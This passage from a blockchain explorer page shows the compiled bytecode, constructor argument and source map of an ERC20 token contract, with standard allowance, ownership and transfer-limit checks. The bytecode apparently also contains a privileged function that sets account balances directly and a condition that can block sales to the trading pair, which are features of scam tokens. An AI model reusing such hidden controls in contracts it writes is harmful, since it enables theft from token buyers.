15b60405180910390a350505050565b6060600780546102ed90610ef0565b3360009081526004602090815260408083206001600160a01b0386168452909152812054828110156105f95760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610414565b610608338561042c8685610f41565b5060019392505050565b600061037d3384846107bc565b6106276108eb565b6001600160a01b03811661068c5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610414565b61069581610945565b50565b6001600160a01b0383166106fa5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610414565b6001600160a01b03821661075b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610414565b6001600160a01b0383811660008181526004602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166107e25760405162461bcd60e51b815260040161041490610ff5565b6001600160a01b0382166108085760405162461bcd60e51b815260040161041490610fb2565b6108138383836109ad565b8061081d57505050565b6001600160a01b0383166000908152600b602052604090205460ff1615801561085f57506001600160a01b0382166000908152600b602052604090205460ff16155b156108db57600c546001600160a01b03838116911614156108db57600d546001600160a01b0316600090815260036020526040902054156108db5760405162461bcd60e51b815260206004820152601660248201527522a92199181d103a37b5b2b7103232b33630ba34b7b760511b6044820152606401610414565b6108e6838383610c25565b505050565b6000546001600160a01b0316331461049c5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610414565b60008054600180546001600160a01b03199081166001600160a01b03808516918217909355918516928116831784556002805490911682179055604051919290917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a350565b60085460ff166108e6576001600160a01b0383166000908152600b602052604090205460ff161580156109f957506001600160a01b0382166000908152600b602052604090205460ff16155b156108e657600954811115610a455760405162461bcd60e51b8152602060048201526012602482015271082dadeeadce840caf0c6cacac8e640dac2f60731b6044820152606401610414565b600c546001600160a01b0316610b8f57600d60009054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b815260040160206040518083038186803b158015610aa357600080fd5b505afa158015610ab7573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610adb919061103a565b60405163e6a4390560e01b8152306004820152732e516ba5bf3b7ee47fb99b09eadb60bde80a82e060248201526001600160a01b03919091169063e6a439059060440160206040518083038186803b158015610b3657600080fd5b505afa158015610b4a573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b6e919061103a565b600c80546001600160a01b0319166001600160a01b03929092169190911790555b600c546001600160a01b0383811691161415610baa57505050565b600a5481610bcd846001600160a01b031660009081526003602052604090205490565b610bd79190610f58565b11156108e65760405162461bcd60e51b815260206004820152601860248201527f4d617820686f6c64696e67206578636565646564206d617800000000000000006044820152606401610414565b6001600160a01b038316610c4b5760405162461bcd60e51b815260040161041490610ff5565b6001600160a01b038216610c715760405162461bcd60e51b815260040161041490610fb2565b6001600160a01b03831660009081526003602052604090205481811015610ce95760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610414565b610cf38282610f41565b6001600160a01b038086166000908152600360205260408082209390935590851681529081208054849290610d29908490610f58565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161055a91815260200190565b600060208083528351808285015260005b81811015610da257858101830151858201604001528201610d86565b81811115610db4576000604083870101525b50601f01601f1916929092016040019392505050565b6001600160a01b038116811461069557600080fd5b60008060408385031215610df257600080fd5b8235610dfd81610dca565b946020939093013593505050565b600080600060608486031215610e2057600080fd5b8335610e2b81610dca565b92506020840135610e3b81610dca565b929592945050506040919091013590565b600060208284031215610e5e57600080fd5b8135610e6981610dca565b9392505050565b600080600060608486031215610e8557600080fd5b8335610e9081610dca565b92506020840135915060408401358015158114610eac57600080fd5b809150509250925092565b60008060408385031215610eca57600080fd5b8235610ed581610dca565b91506020830135610ee581610dca565b809150509250929050565b600181811c90821680610f0457607f821691505b60208210811415610f2557634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b600082821015610f5357610f53610f2b565b500390565b60008219821115610f6b57610f6b610f2b565b500190565b60208082526022908201527f45524332303a207472616e736665722066726f6d206f776e6572206164647265604082015261737360f01b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60006020828403121561104c57600080fd5b8151610e6981610dca56fea264697066735822122098e255935a5ef4fef017bda52d62a838802557df3c48a24345e62f74184230f564736f6c63430008090033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d

-----Decoded View---------------
Arg [0] : router (address): 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d


Deployed Bytecode Sourcemap

16854:2303:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8467:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10633:169;;;;;;:::i;:::-;;:::i;:::-;;;1237:14:1;;1230:22;1212:41;;1200:2;1185:18;10633:169:0;1072:187:1;9586:108:0;9674:12;;9586:108;;;1410:25:1;;;1398:2;1383:18;9586:108:0;1264:177:1;11284:422:0;;;;;;:::i;:::-;;:::i;9429:92::-;;;9512:1;2049:36:1;;2037:2;2022:18;9429:92:0;1907:184:1;17171:25:0;;;;;;12115:215;;;;;;:::i;:::-;;:::i;17111:20::-;;;;;;;;;19078:76;;;:::i;:::-;;9757:127;;;;;;:::i;:::-;-1:-1:-1;;;;;9858:18:0;9831:7;9858:18;;;:9;:18;;;;;;;9757:127;2003:103;;;:::i;17138:26::-;;;;;;14746:449;;;;;;:::i;:::-;;:::i;1353:87::-;1399:7;1426:6;1353:87;;-1:-1:-1;;;;;1426:6:0;;;2983:51:1;;2971:2;2956:18;1353:87:0;2837:203:1;8686:104:0;;;:::i;17203:43::-;;;;;;:::i;:::-;;;;;;;;;;;;;;;;12833:377;;;;;;:::i;:::-;;:::i;10097:175::-;;;;;;:::i;:::-;;:::i;10335:151::-;;;;;;:::i;:::-;-1:-1:-1;;;;;10451:18:0;;;10424:7;10451:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;10335:151;2262:201;;;;;;:::i;:::-;;:::i;8467:100::-;8521:13;8554:5;8547:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8467:100;:::o;10633:169::-;10716:4;10733:39;388:10;10756:7;10765:6;10733:8;:39::i;:::-;-1:-1:-1;10790:4:0;10633:169;;;;:::o;11284:422::-;11390:4;11407:36;11417:6;11425:9;11436:6;11407:9;:36::i;:::-;-1:-1:-1;;;;;11483:19:0;;11456:24;11483:19;;;:11;:19;;;;;;;;388:10;11483:33;;;;;;;;11535:26;;;;11527:79;;;;-1:-1:-1;;;11527:79:0;;4025:2:1;11527:79:0;;;4007:21:1;4064:2;4044:18;;;4037:30;4103:34;4083:18;;;4076:62;-1:-1:-1;;;4154:18:1;;;4147:38;4202:19;;11527:79:0;;;;;;;;;11617:57;11626:6;388:10;11648:25;11667:6;11648:16;:25;:::i;:::-;11617:8;:57::i;:::-;-1:-1:-1;11694:4:0;;11284:422;-1:-1:-1;;;;11284:422:0:o;12115:215::-;388:10;12203:4;12252:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;12252:34:0;;;;;;;;;;12203:4;;12220:80;;12243:7;;12252:47;;12289:10;;12252:47;:::i;19078:76::-;1238:13;:11;:13::i;:::-;19131:8:::1;:15:::0;;-1:-1:-1;;19131:15:0::1;19142:4;19131:15;::::0;;19078:76::o;2003:103::-;1238:13;:11;:13::i;:::-;2068:30:::1;2095:1;2068:18;:30::i;:::-;2003:103::o:0;14746:449::-;14854:14;;-1:-1:-1;;;;;14854:14:0;14889:10;:20;;14881:67;;;;-1:-1:-1;;;14881:67:0;;;;;;;:::i;:::-;14977:4;14967:14;;;;14959:61;;;;-1:-1:-1;;;14959:61:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15039:21:0;;15031:69;;;;-1:-1:-1;;;15031:69:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15113:18:0;;;;;;:9;:18;;;;;;;;:27;;;15156:31;1410:25:1;;;15113:18:0;;;15156:31;;1383:18:1;15156:31:0;;;;;;;;14826:369;14746:449;;;:::o;8686:104::-;8742:13;8775:7;8768:14;;;;;:::i;12833:377::-;388:10;12926:4;12970:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;12970:34:0;;;;;;;;;;13023:35;;;;13015:85;;;;-1:-1:-1;;;13015:85:0;;5636:2:1;13015:85:0;;;5618:21:1;5675:2;5655:18;;;5648:30;5714:34;5694:18;;;5687:62;-1:-1:-1;;;5765:18:1;;;5758:35;5810:19;;13015:85:0;5434:401:1;13015:85:0;13111:67;388:10;13134:7;13143:34;13162:15;13143:16;:34;:::i;13111:67::-;-1:-1:-1;13198:4:0;;12833:377;-1:-1:-1;;;12833:377:0:o;10097:175::-;10183:4;10200:42;388:10;10224:9;10235:6;10200:9;:42::i;2262:201::-;1238:13;:11;:13::i;:::-;-1:-1:-1;;;;;2351:22:0;::::1;2343:73;;;::::0;-1:-1:-1;;;2343:73:0;;6042:2:1;2343:73:0::1;::::0;::::1;6024:21:1::0;6081:2;6061:18;;;6054:30;6120:34;6100:18;;;6093:62;-1:-1:-1;;;6171:18:1;;;6164:36;6217:19;;2343:73:0::1;5840:402:1::0;2343:73:0::1;2427:28;2446:8;2427:18;:28::i;:::-;2262:201:::0;:::o;15633:346::-;-1:-1:-1;;;;;15735:19:0;;15727:68;;;;-1:-1:-1;;;15727:68:0;;6449:2:1;15727:68:0;;;6431:21:1;6488:2;6468:18;;;6461:30;6527:34;6507:18;;;6500:62;-1:-1:-1;;;6578:18:1;;;6571:34;6622:19;;15727:68:0;6247:400:1;15727:68:0;-1:-1:-1;;;;;15814:21:0;;15806:68;;;;-1:-1:-1;;;15806:68:0;;6854:2:1;15806:68:0;;;6836:21:1;6893:2;6873:18;;;6866:30;6932:34;6912:18;;;6905:62;-1:-1:-1;;;6983:18:1;;;6976:32;7025:19;;15806:68:0;6652:398:1;15806:68:0;-1:-1:-1;;;;;15887:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;15939:32;;1410:25:1;;;15939:32:0;;1383:18:1;15939:32:0;;;;;;;15633:346;;;:::o;17741:645::-;-1:-1:-1;;;;;17873:18:0;;17865:68;;;;-1:-1:-1;;;17865:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;17952:16:0;;17944:64;;;;-1:-1:-1;;;17944:64:0;;;;;;;:::i;:::-;18022:34;18039:4;18045:2;18049:6;18022:16;:34::i;:::-;18073:11;18069:50;;17741:645;;;:::o;18069:50::-;-1:-1:-1;;;;;18136:17:0;;;;;;:11;:17;;;;;;;;18135:18;:38;;;;-1:-1:-1;;;;;;18158:15:0;;;;;;:11;:15;;;;;;;;18157:16;18135:38;18131:202;;;18198:13;;-1:-1:-1;;;;;18192:19:0;;;18198:13;;18192:19;18189:133;;;18257:15;;-1:-1:-1;;;;;18257:15:0;9831:7;9858:18;;;:9;:18;;;;;;18239:40;18231:75;;;;-1:-1:-1;;;18231:75:0;;7663:2:1;18231:75:0;;;7645:21:1;7702:2;7682:18;;;7675:30;-1:-1:-1;;;7721:18:1;;;7714:52;7783:18;;18231:75:0;7461:346:1;18231:75:0;18345:33;18361:4;18367:2;18371:6;18345:15;:33::i;:::-;17741:645;;;:::o;1519:132::-;1399:7;1426:6;-1:-1:-1;;;;;1426:6:0;388:10;1583:23;1575:68;;;;-1:-1:-1;;;1575:68:0;;8014:2:1;1575:68:0;;;7996:21:1;;;8033:18;;;8026:30;8092:34;8072:18;;;8065:62;8144:18;;1575:68:0;7812:356:1;2624:219:0;2709:6;;;;2698:17;;-1:-1:-1;;;;;;2698:17:0;;;-1:-1:-1;;;;;2709:6:0;;;2698:17;;;;;;2726;;;;;;;;;;2754:14;:25;;;;;;;;;2795:40;;2726:17;;2709:6;;2795:40;;2709:6;2795:40;2624:219;:::o;18394:676::-;18521:8;;;;18516:547;;-1:-1:-1;;;;;18551:17:0;;;;;;:11;:17;;;;;;;;18550:18;:38;;;;-1:-1:-1;;;;;;18573:15:0;;;;;;:11;:15;;;;;;;;18572:16;18550:38;18546:506;;;18627:11;;18617:6;:21;;18609:52;;;;-1:-1:-1;;;18609:52:0;;8375:2:1;18609:52:0;;;8357:21:1;8414:2;8394:18;;;8387:30;-1:-1:-1;;;8433:18:1;;;8426:48;8491:18;;18609:52:0;8173:342:1;18609:52:0;18686:13;;-1:-1:-1;;;;;18686:13:0;18682:158;;18765:15;;;;;;;;;-1:-1:-1;;;;;18765:15:0;-1:-1:-1;;;;;18765:23:0;;:25;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;18747:73;;-1:-1:-1;;;18747:73:0;;18808:4;18747:73;;;8988:34:1;17060:42:0;9038:18:1;;;9031:43;-1:-1:-1;;;;;18747:52:0;;;;;;;8923:18:1;;18747:73:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;18731:13;:89;;-1:-1:-1;;;;;;18731:89:0;-1:-1:-1;;;;;18731:89:0;;;;;;;;;;18682:158;18871:13;;-1:-1:-1;;;;;18865:19:0;;;18871:13;;18865:19;18861:74;;;18394:676;;;:::o;18861:74::-;18997:10;;18987:6;18971:13;18981:2;-1:-1:-1;;;;;9858:18:0;9831:7;9858:18;;;:9;:18;;;;;;;9757:127;18971:13;:22;;;;:::i;:::-;:36;;18963:73;;;;-1:-1:-1;;;18963:73:0;;9287:2:1;18963:73:0;;;9269:21:1;9326:2;9306:18;;;9299:30;9365:26;9345:18;;;9338:54;9409:18;;18963:73:0;9085:348:1;13700:604:0;-1:-1:-1;;;;;13806:20:0;;13798:70;;;;-1:-1:-1;;;13798:70:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;13887:23:0;;13879:71;;;;-1:-1:-1;;;13879:71:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;14047:17:0;;14023:21;14047:17;;;:9;:17;;;;;;14083:23;;;;14075:74;;;;-1:-1:-1;;;14075:74:0;;9640:2:1;14075:74:0;;;9622:21:1;9679:2;9659:18;;;9652:30;9718:34;9698:18;;;9691:62;-1:-1:-1;;;9769:18:1;;;9762:36;9815:19;;14075:74:0;9438:402:1;14075:74:0;14180:22;14196:6;14180:13;:22;:::i;:::-;-1:-1:-1;;;;;14160:17:0;;;;;;;:9;:17;;;;;;:42;;;;14213:20;;;;;;;;:30;;14237:6;;14160:17;14213:30;;14237:6;;14213:30;:::i;:::-;;;;;;;;14278:9;-1:-1:-1;;;;;14261:35:0;14270:6;-1:-1:-1;;;;;14261:35:0;;14289:6;14261:35;;;;1410:25:1;;1398:2;1383:18;;1264:177;14:597;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;452:6;449:1;446:13;443:91;;;522:1;517:2;508:6;497:9;493:22;489:31;482:42;443:91;-1:-1:-1;595:2:1;574:15;-1:-1:-1;;570:29:1;555:45;;;;602:2;551:54;;14:597;-1:-1:-1;;;14:597:1:o;616:131::-;-1:-1:-1;;;;;691:31:1;;681:42;;671:70;;737:1;734;727:12;752:315;820:6;828;881:2;869:9;860:7;856:23;852:32;849:52;;;897:1;894;887:12;849:52;936:9;923:23;955:31;980:5;955:31;:::i;:::-;1005:5;1057:2;1042:18;;;;1029:32;;-1:-1:-1;;;752:315:1:o;1446:456::-;1523:6;1531;1539;1592:2;1580:9;1571:7;1567:23;1563:32;1560:52;;;1608:1;1605;1598:12;1560:52;1647:9;1634:23;1666:31;1691:5;1666:31;:::i;:::-;1716:5;-1:-1:-1;1773:2:1;1758:18;;1745:32;1786:33;1745:32;1786:33;:::i;:::-;1446:456;;1838:7;;-1:-1:-1;;;1892:2:1;1877:18;;;;1864:32;;1446:456::o;2096:247::-;2155:6;2208:2;2196:9;2187:7;2183:23;2179:32;2176:52;;;2224:1;2221;2214:12;2176:52;2263:9;2250:23;2282:31;2307:5;2282:31;:::i;:::-;2332:5;2096:247;-1:-1:-1;;;2096:247:1:o;2348:484::-;2422:6;2430;2438;2491:2;2479:9;2470:7;2466:23;2462:32;2459:52;;;2507:1;2504;2497:12;2459:52;2546:9;2533:23;2565:31;2590:5;2565:31;:::i;:::-;2615:5;-1:-1:-1;2667:2:1;2652:18;;2639:32;;-1:-1:-1;2723:2:1;2708:18;;2695:32;2765:15;;2758:23;2746:36;;2736:64;;2796:1;2793;2786:12;2736:64;2819:7;2809:17;;;2348:484;;;;;:::o;3045:388::-;3113:6;3121;3174:2;3162:9;3153:7;3149:23;3145:32;3142:52;;;3190:1;3187;3180:12;3142:52;3229:9;3216:23;3248:31;3273:5;3248:31;:::i;:::-;3298:5;-1:-1:-1;3355:2:1;3340:18;;3327:32;3368:33;3327:32;3368:33;:::i;:::-;3420:7;3410:17;;;3045:388;;;;;:::o;3438:380::-;3517:1;3513:12;;;;3560;;;3581:61;;3635:4;3627:6;3623:17;3613:27;;3581:61;3688:2;3680:6;3677:14;3657:18;3654:38;3651:161;;;3734:10;3729:3;3725:20;3722:1;3715:31;3769:4;3766:1;3759:15;3797:4;3794:1;3787:15;3651:161;;3438:380;;;:::o;4232:127::-;4293:10;4288:3;4284:20;4281:1;4274:31;4324:4;4321:1;4314:15;4348:4;4345:1;4338:15;4364:125;4404:4;4432:1;4429;4426:8;4423:34;;;4437:18;;:::i;:::-;-1:-1:-1;4474:9:1;;4364:125::o;4494:128::-;4534:3;4565:1;4561:6;4558:1;4555:13;4552:39;;;4571:18;;:::i;:::-;-1:-1:-1;4607:9:1;;4494:128::o;4627:398::-;4829:2;4811:21;;;4868:2;4848:18;;;4841:30;4907:34;4902:2;4887:18;;4880:62;-1:-1:-1;;;4973:2:1;4958:18;;4951:32;5015:3;5000:19;;4627:398::o;5030:399::-;5232:2;5214:21;;;5271:2;5251:18;;;5244:30;5310:34;5305:2;5290:18;;5283:62;-1:-1:-1;;;5376:2:1;5361:18;;5354:33;5419:3;5404:19;;5030:399::o;7055:401::-;7257:2;7239:21;;;7296:2;7276:18;;;7269:30;7335:34;7330:2;7315:18;;7308:62;-1:-1:-1;;;7401:2:1;7386:18;;7379:35;7446:3;7431:19;;7055:401::o;8520:251::-;8590:6;8643:2;8631:9;8622:7;8618:23;8614:32;8611:52;;;8659:1;8656;8649:12;8611:52;8691:9;8685:16;8710:31;8735:5;8710:31;:::i

Swarm Source

ipfs://98e255935a5ef4fef017bda52d62a838802557df3c48a24345e62f74184230f5
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.